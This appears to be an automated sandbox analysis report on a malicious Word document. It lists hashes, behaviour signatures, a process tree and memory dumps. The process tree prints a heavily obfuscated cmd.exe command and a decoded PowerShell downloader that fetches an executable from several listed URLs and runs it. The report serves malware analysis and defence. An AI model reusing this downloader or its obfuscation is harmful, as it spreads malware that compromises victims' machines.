Overview

overview

10

Static

static

8

48c247e5dc...2d.doc

windows7-x64

10

48c247e5dc...2d.doc

windows10-2004-x64

10

Analysis

  • max time kernel
    157s
  • max time network
    188s
  • platform
    windows7_x64
  • resource
    win7-20220718-en
  • resource tags

    arch:x64arch:x86image:win7-20220718-enlocale:en-usos:windows7-x64system
  • submitted
    31-07-2022 08:16

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    48c247e5dc712829c5af6a481e0466eb4c92d6ba88bd21bf396a72bd1b2ef22d.doc

  • Size

    89KB

  • MD5

    e1aa1560568d4abcc34ea3d92d431abb

  • SHA1

    b44664fc22f810080ea04d16903ea52099881d77

  • SHA256

    48c247e5dc712829c5af6a481e0466eb4c92d6ba88bd21bf396a72bd1b2ef22d

  • SHA512

    5e28911577c51c98a69345f92aed04df9c6b9c66cb961417fa7a92e31aae084c1353a8c7a52a84f06738cc34c9bac5fcaadfbd6d3f833581523d9ae34873ef60

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 9 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
    adwarespyware
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\48c247e5dc712829c5af6a481e0466eb4c92d6ba88bd21bf396a72bd1b2ef22d.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:240
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1740
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c %LocALappData:~ -3, -2%%pROgramdATa:~-5, 1%D, , /v, /R " ,, ( , (^sET ^ ^ ^ 9o^jB=od^ mC ^58 9i Pa^ OT^ ^B7 ^5M TC 65 AS a4 NT CR^ y^h^ ^8^6 ^BO VQ^}In}B^0{Pxhk^ics^JtZma^K^sc^Qz}zs}0^8k^e5aXZeT^kr4rbt^B;r^SW^y^X^d8yR^dU^$I^7 v^wsdC^s9q^e^7^pc^ xon^urzF^P^JX-Ox^tBZrH^e^aCLt^sMSC0;N^6^)6LW^d^Ldr^TR^a^2$4N^(O0eymluL^i^m^M^fZno^JAtX^xeLjv^FpaeKs^yr.aYp9^KvvQ^sk5$v4;^Q^p^)V^oyCd^d^FEowf^Ba^weCZ^s1an^Aroq^Zpg^K^s^HWebMr^o^X.l^jY^w^3I^e^b^u1u$L^p^(8ceJkt^hs^i^uQrxCwuV.P5^pEfvuEs^F9^$VJ;^8c^1rZ I^3=^Yz^ ^q^HeCFp^B^tyW^e^tfV.F3p3ZvwWsKe^$l^6^;D1^)^5v^(MnnU^Se^s^tpAvo5k.HIpnzv5m^sHC$^Og{q^j^ Cx^)C^S0pO01^J^2sn V^wq^lN^ev^i-DI ^Lts5yuP2t^WXa 4^to^Q^SJ^L.CpYA^QIsEurk$x^7^(v5 yV^f9wIFM;UF^)lJ^( ^I^dg^Hn^Qx^eB5siI^.kuY^i1I^hSu^Gy$C^M;iR^)bL^0dc,^bjv^a^HXk^0^PnI$^a^m,aD'ME^THNEN^j^G^Pw'tX^(lGn^obexF^p9z^ogx.c^OYyR^IIhuS^p^$G0^{yAy^HCr^3TtA^x^{Dv^)0^YFubQ^o^Ui^B^e$cG^ O9ni0^iV^a ^5^fvm^4XKMPHJ^$E5^(o^q^h^ygcv^pavBeAQrN^PoUkffh;IF^'tz^mWVa^FRe^mEr^G^wtecsU^e^.GzbAldu4^oS^6^dC3a^F7^'^Z9 9kmNFo5rc3^T^-i^h SXthQcK^ke^Hi^jx^obwVO^bt-SbwN^7^eGSNJG mb=hA JZp^l^qv4ysX^P$vz;P^f^'6Gp^Un^t^Hk^tNWhG7lPJmr^wx^4 .^DV^2RqlOwm^2jxjV^s^Op^mD^x'vb nCmclo^3^zcP4-m^w U^L^t^I4c5^2eSv^jBm^b^W^fO^d7-^f^2wL^I^ev3NrT=bS giYMNIq2^uK^W^$3^G;^DR^)^lS'B^j^eXZxbZ^ea3.OGwtEUajzrV\sv'jR+Rv^)^U5^(E^ hxC^t2^Wa^7a^PBzpaUmAO^ev^UT^e^ t6^ae^wiGk^M:bC:ki^]DPhJftR0^anvPOq^.^3c^O3^FIrG.^8BmiMe8wttksHoyhV^SKc[^j^X^( t=^4n^W9p^d^2^KRVY^$G ^;es^) ^P^'QW@aX'^Ow^(^aQt^TP^i7^dl^b7pa5^Ss5.4t'3^KgzV^HMLiE4^a^UAD49ibjf0j/ERm^dmo^ZTcQe.e^L^gRJ^b3^Y^m^wir1j^a^MKf6^geDR.fVachiTXrTMaN5g^G4l9Gu^8vbUN-^5csC8^a5^XgP^Yor^Ui^2WbO^4/1o/fN:03pa^St^Q^Y^tzd^h4v@^Zmq^Hc^sFP/Ikm^Sn^o^e^fc9r.V^PzY^mb^gYa9RsrOg^mnr^QRbb^m.UIw^h^P^w3yw5t/V7/AV:^QDp^o^ltpQtW^oh2S^@Cimr^hVl^6^BkM0MFad^iS^15/jXz2tiUYb^BU.T6y^Ayc^7^3nKXe86gHTacD^eJ^7v4YiyothZaF9e7grDNc^48^.dAw^Q3wLh^wt^K/Pf/^3Z^:Ujpr^Mt^Yh^tZ^shRA^@3^i^6cbJ^qbW^Q1NDH/^q7^thAe^pCnD^1.^s^h^o9Vn7Ya^O^ujy^q^uyW^diengRaWemoc/50/ ^G:mdpAUt^HNtw^4^h1x^@ZCtNO7Uo8NjW^K^D^dyZ^x^eUYGL/KBm^kW^o^UKcUV^.^LSa^xy^iB^y^dC^ZeGZm^jva^ hm4m^io^5hEnaAPmjG/iZ/h^J:^ ppsNt^J^h^t4 ^hBR'bC^=gc^Fm^x^Qu5ixU^$0B;^p0'dm^d4^I^f^gLr^Xb^'pU=4hi^kJ^Y1MBeD^$N^G HilK9lQw^e^s^BhrHsDIrSXe^Q^Dw^W^fojN^p) , , , , ,)& ,,, ^For, , , /^l , %^3 , ,, ^IN,, (+16^40 ^, ^ -^3^ ^,+^2^ ) , ^d^O, , , ( ,(, , S^E^T c2^zZ=!c2^zZ!!9o^jB:~ %^3,1!) , , ,)&& , , , IF , ,%^3 ,, , == , , ^2 ,, ( , ( (ca^lL, , %c2^zZ:~ +6% ) , , , , , ) ,) "
        2⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:1804
    • C:\Windows\SysWOW64\cmd.exe
      cmD , , /v, /R " ,, ( , (^sET ^ ^ ^ 9o^jB=od^ mC ^58 9i Pa^ OT^ ^B7 ^5M TC 65 AS a4 NT CR^ y^h^ ^8^6 ^BO VQ^}In}B^0{Pxhk^ics^JtZma^K^sc^Qz}zs}0^8k^e5aXZeT^kr4rbt^B;r^SW^y^X^d8yR^dU^$I^7 v^wsdC^s9q^e^7^pc^ xon^urzF^P^JX-Ox^tBZrH^e^aCLt^sMSC0;N^6^)6LW^d^Ldr^TR^a^2$4N^(O0eymluL^i^m^M^fZno^JAtX^xeLjv^FpaeKs^yr.aYp9^KvvQ^sk5$v4;^Q^p^)V^oyCd^d^FEowf^Ba^weCZ^s1an^Aroq^Zpg^K^s^HWebMr^o^X.l^jY^w^3I^e^b^u1u$L^p^(8ceJkt^hs^i^uQrxCwuV.P5^pEfvuEs^F9^$VJ;^8c^1rZ I^3=^Yz^ ^q^HeCFp^B^tyW^e^tfV.F3p3ZvwWsKe^$l^6^;D1^)^5v^(MnnU^Se^s^tpAvo5k.HIpnzv5m^sHC$^Og{q^j^ Cx^)C^S0pO01^J^2sn V^wq^lN^ev^i-DI ^Lts5yuP2t^WXa 4^to^Q^SJ^L.CpYA^QIsEurk$x^7^(v5 yV^f9wIFM;UF^)lJ^( ^I^dg^Hn^Qx^eB5siI^.kuY^i1I^hSu^Gy$C^M;iR^)bL^0dc,^bjv^a^HXk^0^PnI$^a^m,aD'ME^THNEN^j^G^Pw'tX^(lGn^obexF^p9z^ogx.c^OYyR^IIhuS^p^$G0^{yAy^HCr^3TtA^x^{Dv^)0^YFubQ^o^Ui^B^e$cG^ O9ni0^iV^a ^5^fvm^4XKMPHJ^$E5^(o^q^h^ygcv^pavBeAQrN^PoUkffh;IF^'tz^mWVa^FRe^mEr^G^wtecsU^e^.GzbAldu4^oS^6^dC3a^F7^'^Z9 9kmNFo5rc3^T^-i^h SXthQcK^ke^Hi^jx^obwVO^bt-SbwN^7^eGSNJG mb=hA JZp^l^qv4ysX^P$vz;P^f^'6Gp^Un^t^Hk^tNWhG7lPJmr^wx^4 .^DV^2RqlOwm^2jxjV^s^Op^mD^x'vb nCmclo^3^zcP4-m^w U^L^t^I4c5^2eSv^jBm^b^W^fO^d7-^f^2wL^I^ev3NrT=bS giYMNIq2^uK^W^$3^G;^DR^)^lS'B^j^eXZxbZ^ea3.OGwtEUajzrV\sv'jR+Rv^)^U5^(E^ hxC^t2^Wa^7a^PBzpaUmAO^ev^UT^e^ t6^ae^wiGk^M:bC:ki^]DPhJftR0^anvPOq^.^3c^O3^FIrG.^8BmiMe8wttksHoyhV^SKc[^j^X^( t=^4n^W9p^d^2^KRVY^$G ^;es^) ^P^'QW@aX'^Ow^(^aQt^TP^i7^dl^b7pa5^Ss5.4t'3^KgzV^HMLiE4^a^UAD49ibjf0j/ERm^dmo^ZTcQe.e^L^gRJ^b3^Y^m^wir1j^a^MKf6^geDR.fVachiTXrTMaN5g^G4l9Gu^8vbUN-^5csC8^a5^XgP^Yor^Ui^2WbO^4/1o/fN:03pa^St^Q^Y^tzd^h4v@^Zmq^Hc^sFP/Ikm^Sn^o^e^fc9r.V^PzY^mb^gYa9RsrOg^mnr^QRbb^m.UIw^h^P^w3yw5t/V7/AV:^QDp^o^ltpQtW^oh2S^@Cimr^hVl^6^BkM0MFad^iS^15/jXz2tiUYb^BU.T6y^Ayc^7^3nKXe86gHTacD^eJ^7v4YiyothZaF9e7grDNc^48^.dAw^Q3wLh^wt^K/Pf/^3Z^:Ujpr^Mt^Yh^tZ^shRA^@3^i^6cbJ^qbW^Q1NDH/^q7^thAe^pCnD^1.^s^h^o9Vn7Ya^O^ujy^q^uyW^diengRaWemoc/50/ ^G:mdpAUt^HNtw^4^h1x^@ZCtNO7Uo8NjW^K^D^dyZ^x^eUYGL/KBm^kW^o^UKcUV^.^LSa^xy^iB^y^dC^ZeGZm^jva^ hm4m^io^5hEnaAPmjG/iZ/h^J:^ ppsNt^J^h^t4 ^hBR'bC^=gc^Fm^x^Qu5ixU^$0B;^p0'dm^d4^I^f^gLr^Xb^'pU=4hi^kJ^Y1MBeD^$N^G HilK9lQw^e^s^BhrHsDIrSXe^Q^Dw^W^fojN^p) , , , , ,)& ,,, ^For, , , /^l , %^3 , ,, ^IN,, (+16^40 ^, ^ -^3^ ^,+^2^ ) , ^d^O, , , ( ,(, , S^E^T c2^zZ=!c2^zZ!!9o^jB:~ %^3,1!) , , ,)&& , , , IF , ,%^3 ,, , == , , ^2 ,, ( , ( (ca^lL, , %c2^zZ:~ +6% ) , , , , , ) ,) "
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:1836
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell $BYi='rfd';$iQF='http://mahimamedia.com/YxdW87t@http://mandujano.net/NWJ6@http://www.creativeagency.biz/Sa0BVm@http://www.brgsabz.com/sq@http://biogas-bulgaria.efarmbg.com/fiDaiHg'.Split('@');$RdW=([System.IO.Path]::GetTempPath()+'\zUw.exe');$uIY =New-Object -com 'msxml2.xmlhttp';$svp = New-Object -com 'adodb.stream';foreach($PXv in $iQF){try{$uIY.open('GET',$PXv,0);$uIY.send();If ($uIY.Status -eq 200) {$svp.open();$svp.type = 1;$svp.write($uIY.responseBody);$svp.savetofile($RdW);Start-Process $RdW;break}}catch{}}
        2⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1588

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/240-60-0x0000000071A4D000-0x0000000071A58000-memory.dmp

      Filesize

      44KB

      Download

    • memory/240-67-0x0000000071A4D000-0x0000000071A58000-memory.dmp

      Filesize

      44KB

      Download

    • memory/240-56-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

      Download

    • memory/240-57-0x0000000076A21000-0x0000000076A23000-memory.dmp

      Filesize

      8KB

      Download

    • memory/240-54-0x0000000072FE1000-0x0000000072FE4000-memory.dmp

      Filesize

      12KB

      Download

    • memory/240-74-0x0000000071A4D000-0x0000000071A58000-memory.dmp

      Filesize

      44KB

      Download

    • memory/240-55-0x0000000070A61000-0x0000000070A63000-memory.dmp

      Filesize

      8KB

      Download

    • memory/240-73-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

      Download

    • memory/1588-71-0x000000006AF90000-0x000000006B53B000-memory.dmp

      Filesize

      5.7MB

      Download

    • memory/1588-72-0x000000006AF90000-0x000000006B53B000-memory.dmp

      Filesize

      5.7MB

      Download

    • memory/1588-68-0x000000006AF90000-0x000000006B53B000-memory.dmp

      Filesize

      5.7MB

      Download

    • memory/1588-69-0x0000000004E40000-0x0000000004E9B000-memory.dmp

      Filesize

      364KB

      Download

    • memory/1588-70-0x0000000005C00000-0x0000000005D33000-memory.dmp

      Filesize

      1.2MB

      Download

    • memory/1740-59-0x000007FEFC4F1000-0x000007FEFC4F3000-memory.dmp

      Filesize

      8KB

      Download